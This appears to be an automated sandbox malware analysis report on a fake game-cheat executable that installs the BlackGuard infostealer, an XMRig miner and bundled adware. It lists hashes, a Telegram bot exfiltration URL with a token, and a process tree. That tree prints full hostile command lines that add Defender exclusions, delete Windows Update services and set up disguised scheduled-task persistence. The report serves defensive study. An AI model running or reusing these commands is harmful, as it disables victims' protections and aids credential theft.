Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28-12-2024 21:12

General

  • Target

    SharcHack.exe

  • Size

    39.9MB

  • MD5

    796310542e9fb2886de3f8cbdf88c9fa

  • SHA1

    01dc8e64ff23db2f177e3d999c12329bfcd206d3

  • SHA256

    9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193

  • SHA512

    73295b9cfa07432b21d1f0d0bad360460f32d7e0170dc84406a35f4dfe2b1519fdc4028299f1075385ae4ab738be1e5bfffd7335c1038e2126669834e9a50966

  • SSDEEP

    786432:Y31/CaCJz7+GWl3LNCxuEnwFho+zM77UDZiZCd08jFZJAI5E70TZFHng:URCR6GWl3LMEXFhV0KAcNjxAItjg

Malware Config

Extracted

Family

blackguard

C2

https://api.telegram.org/bot6540906397:AAG08fPgT-V7I17vtz49STaZEuwqXqKshuM/sendMessage?chat_id=5445185021

Signatures

  • BlackGuard

    Infostealer first seen in Late 2021.

  • Blackguard family
  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 16 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 10 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Writes to the Master Boot Record (MBR) 1 TTPs 8 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 12 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Embeds OpenSSL 3 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 25 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 28 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1188
      • C:\Users\Admin\AppData\Local\Temp\SharcHack.exe
        "C:\Users\Admin\AppData\Local\Temp\SharcHack.exe"
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2700
        • C:\Users\Admin\AppData\Local\Temp\3.exe
          "C:\Users\Admin\AppData\Local\Temp\3.exe"
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Suspicious behavior: EnumeratesProcesses
          PID:2928
        • C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe
          "C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2668
          • C:\Users\Admin\AppData\Local\Temp\v2.exe
            "C:\Users\Admin\AppData\Local\Temp\v2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2604
        • C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe
          "C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3024
          • C:\Users\Admin\AppData\Local\Temp\is-I0JUN.tmp\CheatEngine75.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-I0JUN.tmp\CheatEngine75.tmp" /SL5="$70150,29079073,832512,C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks for any installed AV software in registry
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of FindShellTrayWindow
            PID:1472
            • C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\prod0_extract\avg_secure_browser_setup.exe
              "C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\prod0_extract\avg_secure_browser_setup.exe" /s /run_source=avg_ads_is_control /is_pixel_psh=BjYV6dOmBzbpLzI3QnidRYj8vsehRbmSYPHYFgONXpNEB5k1QcPx1ILIZItV9NQjktccaZSWah9iFpD /make-default
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks for any installed AV software in registry
              • Writes to the Master Boot Record (MBR)
              • System Location Discovery: System Language Discovery
              PID:1632
            • C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\prod1_extract\avg_antivirus_free_setup.exe
              "C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\prod1_extract\avg_antivirus_free_setup.exe" /silent /ws /psh:92pTu5hwBbUwSDabApZ5ioMeawujmyzfpzMyasdVG87iPTXqY6Np0BcOppoHHkFwZSMjyhKd1J6Csp
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Writes to the Master Boot Record (MBR)
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              PID:1308
              • C:\Windows\Temp\asw.ba849cdd64737d84\avg_antivirus_free_setup_x64.exe
                "C:\Windows\Temp\asw.ba849cdd64737d84\avg_antivirus_free_setup_x64.exe" /silent /ws /psh:92pTu5hwBbUwSDabApZ5ioMeawujmyzfpzMyasdVG87iPTXqY6Np0BcOppoHHkFwZSMjyhKd1J6Csp /cookie:mmm_irs_ppi_902_451_o /ga_clientid:0a1243ba-3708-4841-a301-70f1901c6930 /edat_dir:C:\Windows\Temp\asw.ba849cdd64737d84
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks for any installed AV software in registry
                • Writes to the Master Boot Record (MBR)
                • Checks processor information in registry
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                PID:2684
                • C:\Windows\Temp\asw.30f330d580325f90\instup.exe
                  "C:\Windows\Temp\asw.30f330d580325f90\instup.exe" /sfx:lite /sfxstorage:C:\Windows\Temp\asw.30f330d580325f90 /edition:15 /prod:ais /stub_context:1e892874-47ad-4f70-acc4-b30b6c2ae755:11216472 /guid:418ebccd-3aed-4a84-ad97-8a5089f8e68e /ga_clientid:0a1243ba-3708-4841-a301-70f1901c6930 /no_delayed_installation /silent /ws /psh:92pTu5hwBbUwSDabApZ5ioMeawujmyzfpzMyasdVG87iPTXqY6Np0BcOppoHHkFwZSMjyhKd1J6Csp /cookie:mmm_irs_ppi_902_451_o /ga_clientid:0a1243ba-3708-4841-a301-70f1901c6930 /edat_dir:C:\Windows\Temp\asw.ba849cdd64737d84
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks for any installed AV software in registry
                  • Writes to the Master Boot Record (MBR)
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1936
                  • C:\Windows\Temp\asw.30f330d580325f90\New_15020c62\instup.exe
                    "C:\Windows\Temp\asw.30f330d580325f90\New_15020c62\instup.exe" /sfx /sfxstorage:C:\Windows\Temp\asw.30f330d580325f90 /edition:15 /prod:ais /stub_context:1e892874-47ad-4f70-acc4-b30b6c2ae755:11216472 /guid:418ebccd-3aed-4a84-ad97-8a5089f8e68e /ga_clientid:0a1243ba-3708-4841-a301-70f1901c6930 /no_delayed_installation /silent /ws /psh:92pTu5hwBbUwSDabApZ5ioMeawujmyzfpzMyasdVG87iPTXqY6Np0BcOppoHHkFwZSMjyhKd1J6Csp /cookie:mmm_irs_ppi_902_451_o /edat_dir:C:\Windows\Temp\asw.ba849cdd64737d84 /online_installer
                    8⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Checks for any installed AV software in registry
                    • Writes to the Master Boot Record (MBR)
                    • Drops file in Program Files directory
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2472
                    • C:\Windows\Temp\asw.30f330d580325f90\New_15020c62\sbr.exe
                      "C:\Windows\Temp\asw.30f330d580325f90\New_15020c62\sbr.exe" 2472 "AVG Antivirus setup" "AVG Antivirus is being installed. Do not shut down your computer!"
                      9⤵
                      • Executes dropped EXE
                      PID:604
            • C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\prod2_extract\CCleaner.exe
              "C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\prod2_extract\CCleaner.exe" /S /PI=L
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2528
              • C:\Users\Admin\AppData\Local\Temp\nszCF43.tmp\CCleanerSetup.exe
                C:\Users\Admin\AppData\Local\Temp\nszCF43.tmp\CCleanerSetup.exe /install /S /PI=L
                6⤵
                • Executes dropped EXE
                • Writes to the Master Boot Record (MBR)
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                PID:2460
                • C:\Program Files\CCleaner\CCleaner64.exe
                  "C:\Program Files\CCleaner\CCleaner64.exe" /createSkipUAC
                  7⤵
                  • Executes dropped EXE
                  PID:2440
                • C:\Program Files\CCleaner\CCUpdate.exe
                  "C:\Program Files\CCleaner\CCUpdate.exe" /reg
                  7⤵
                  • Executes dropped EXE
                  • Writes to the Master Boot Record (MBR)
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2024
                  • C:\Program Files\CCleaner\CCUpdate.exe
                    CCUpdate.exe /emupdater /applydll "C:\Program Files\CCleaner\Setup\359d8f54-c99b-439e-ab03-605358be04e5.dll"
                    8⤵
                    • Executes dropped EXE
                    • Writes to the Master Boot Record (MBR)
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2244
                • C:\Program Files\CCleaner\CCleaner64.exe
                  "C:\Program Files\CCleaner\CCleaner64.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2568
            • C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\CheatEngine75.exe
              "C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2812
              • C:\Users\Admin\AppData\Local\Temp\is-0EQ7K.tmp\CheatEngine75.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-0EQ7K.tmp\CheatEngine75.tmp" /SL5="$7016E,26511452,832512,C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                • Suspicious use of FindShellTrayWindow
                PID:1592
                • C:\Windows\system32\net.exe
                  "net" stop BadlionAntic
                  7⤵
                    PID:2836
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop BadlionAntic
                      8⤵
                        PID:2004
                    • C:\Windows\system32\net.exe
                      "net" stop BadlionAnticheat
                      7⤵
                        PID:2324
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 stop BadlionAnticheat
                          8⤵
                            PID:1564
                        • C:\Windows\system32\sc.exe
                          "sc" delete BadlionAntic
                          7⤵
                          • Launches sc.exe
                          PID:2440
                        • C:\Windows\system32\sc.exe
                          "sc" delete BadlionAnticheat
                          7⤵
                          • Launches sc.exe
                          PID:2268
                        • C:\Users\Admin\AppData\Local\Temp\is-3QFDV.tmp\_isetup\_setup64.tmp
                          helper 105 0x1F8
                          7⤵
                          • Executes dropped EXE
                          PID:1896
                        • C:\Windows\system32\icacls.exe
                          "icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)
                          7⤵
                          • Modifies file permissions
                          PID:1968
                        • C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe
                          "C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe" /SETUP
                          7⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:1304
                        • C:\Program Files\Cheat Engine 7.5\windowsrepair.exe
                          "C:\Program Files\Cheat Engine 7.5\windowsrepair.exe" /s
                          7⤵
                          • Executes dropped EXE
                          PID:920
                        • C:\Windows\system32\icacls.exe
                          "icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)
                          7⤵
                          • Modifies file permissions
                          PID:1016
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:792
              • C:\Windows\System32\cmd.exe
                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2660
                • C:\Windows\System32\sc.exe
                  sc stop UsoSvc
                  3⤵
                  • Launches sc.exe
                  PID:2708
                • C:\Windows\System32\sc.exe
                  sc stop WaaSMedicSvc
                  3⤵
                  • Launches sc.exe
                  PID:2716
                • C:\Windows\System32\sc.exe
                  sc stop wuauserv
                  3⤵
                  • Launches sc.exe
                  PID:2868
                • C:\Windows\System32\sc.exe
                  sc stop bits
                  3⤵
                  • Launches sc.exe
                  PID:592
                • C:\Windows\System32\sc.exe
                  sc stop dosvc
                  3⤵
                  • Launches sc.exe
                  PID:2808
                • C:\Windows\System32\reg.exe
                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                  3⤵
                    PID:1216
                  • C:\Windows\System32\reg.exe
                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                    3⤵
                      PID:1932
                    • C:\Windows\System32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                      3⤵
                      • Modifies security service
                      PID:576
                    • C:\Windows\System32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                      3⤵
                        PID:1504
                      • C:\Windows\System32\reg.exe
                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                        3⤵
                          PID:2392
                      • C:\Windows\System32\cmd.exe
                        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        2⤵
                        • Power Settings
                        • Suspicious use of WriteProcessMemory
                        PID:2652
                        • C:\Windows\System32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          3⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1648
                        • C:\Windows\System32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          3⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2564
                        • C:\Windows\System32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          3⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2576
                        • C:\Windows\System32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          3⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3020
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2820
                        • C:\Windows\system32\schtasks.exe
                          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                          3⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:2776
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                        2⤵
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1852
                        • C:\Windows\system32\schtasks.exe
                          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                          3⤵
                            PID:536
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2944
                        • C:\Windows\System32\cmd.exe
                          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                          2⤵
                            PID:1016
                            • C:\Windows\System32\sc.exe
                              sc stop UsoSvc
                              3⤵
                              • Launches sc.exe
                              PID:1420
                            • C:\Windows\System32\sc.exe
                              sc stop WaaSMedicSvc
                              3⤵
                              • Launches sc.exe
                              PID:3000
                            • C:\Windows\System32\sc.exe
                              sc stop wuauserv
                              3⤵
                              • Launches sc.exe
                              PID:604
                            • C:\Windows\System32\sc.exe
                              sc stop bits
                              3⤵
                              • Launches sc.exe
                              PID:1652
                            • C:\Windows\System32\sc.exe
                              sc stop dosvc
                              3⤵
                              • Launches sc.exe
                              PID:2276
                            • C:\Windows\System32\reg.exe
                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                              3⤵
                                PID:2120
                              • C:\Windows\System32\reg.exe
                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                3⤵
                                  PID:1328
                                • C:\Windows\System32\reg.exe
                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                  3⤵
                                    PID:784
                                  • C:\Windows\System32\reg.exe
                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                    3⤵
                                      PID:1208
                                    • C:\Windows\System32\reg.exe
                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                      3⤵
                                        PID:2500
                                    • C:\Windows\System32\cmd.exe
                                      C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                      2⤵
                                      • Power Settings
                                      PID:1604
                                      • C:\Windows\System32\powercfg.exe
                                        powercfg /x -hibernate-timeout-ac 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2080
                                      • C:\Windows\System32\powercfg.exe
                                        powercfg /x -hibernate-timeout-dc 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2976
                                      • C:\Windows\System32\powercfg.exe
                                        powercfg /x -standby-timeout-ac 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1252
                                      • C:\Windows\System32\powercfg.exe
                                        powercfg /x -standby-timeout-dc 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2604
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                      2⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2916
                                      • C:\Windows\system32\schtasks.exe
                                        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                        3⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:956
                                    • C:\Windows\System32\conhost.exe
                                      C:\Windows\System32\conhost.exe ubulqosn
                                      2⤵
                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1168
                                    • C:\Windows\System32\cmd.exe
                                      C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                      2⤵
                                        PID:2592
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic PATH Win32_VideoController GET Name, VideoProcessor
                                          3⤵
                                          • Detects videocard installed
                                          • Modifies data under HKEY_USERS
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:940
                                      • C:\Windows\System32\cmd.exe
                                        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                        2⤵
                                        • Drops file in Program Files directory
                                        PID:864
                                      • C:\Windows\System32\conhost.exe
                                        C:\Windows\System32\conhost.exe vgyegivgfazcjxdl 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/zRLKpUXs5FnM1Cz+lDKtsCEDVmxImOWutHy/wWAAF6uYRISXHrJSUiB0oBkYNVSVc+Z5TfdaGGtLWt9rhn1IwMTF8FurdYcS6sHeOOKov7n8fO9XzXfUsz+ohQT/DgIOyRpUwzATAbwxDv0BlAH+ISI2MOv7cXgWh/hEHn9UpTLH2AUxVXP8zWMLLWvPHAJe2SIfhjGncq3xQ+gVn+I4NKh77PPjDPgwHNzByaS5XiUtDR8Md5EhmkOEwD9v8Eh4nbJIewLTK837YGsKnb02yQo3e+jdFtCWzMfMeobPaXFvrKzv2emNNnxavmVO2FkfkcC1DvbnhN7NqgiVLh1FnuRerr7Rs9GSm8wk3eogEBuxtyJF/l7QvFFEn+PmzyQ6wNeX5T4KpCB8N2LdQ7qGf0xREtOLrL2we+R3IiFUCw/PgUnlB9aOUvPUntLmUYwnVg3n39kwuMDyHF7sntpqwSQW5ruNhQsPrhI9EqpLJ48=
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1476
                                    • C:\Windows\system32\taskeng.exe
                                      taskeng.exe {3F155F07-C3EC-40DB-AEAF-1E63355D6941} S-1-5-18:NT AUTHORITY\System:Service:
                                      1⤵
                                      • Loads dropped DLL
                                      PID:2044
                                      • C:\Program Files\Google\Chrome\updater.exe
                                        "C:\Program Files\Google\Chrome\updater.exe"
                                        2⤵
                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2804

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Program Files\AVG\Antivirus\setup\Stats.ini

                                      Filesize

                                      2KB

                                      MD5

                                      34337a7f370b1d4ddaeaaff526943c28

                                      SHA1

                                      24d6495b565bd50f83088c51ea06061172948c2c

                                      SHA256

                                      5bead349d8b4b7648230b7459c275e03c4fb29a92db9bf24391cc2f77a44f847

                                      SHA512

                                      463921c5b86b61c38cbeee6d97fb00a8956f4ba4396bf8f0a7f09e744eee44e72c1f85b09aa5c05994d41c0e24ce7aada75040ab159a60f6ca6d7d5860bfa7ba

                                    • C:\Program Files\AVG\Antivirus\setup\Stats.ini

                                      Filesize

                                      2KB

                                      MD5

                                      eed5118a000dbea298af82081b1887d6

                                      SHA1

                                      265972019e59d9423ff52a9bfde436b361d10432

                                      SHA256

                                      245297246e8cc3e5f2ec070402517e6d7a52426e34b5a89d35ad307e14138ce0

                                      SHA512

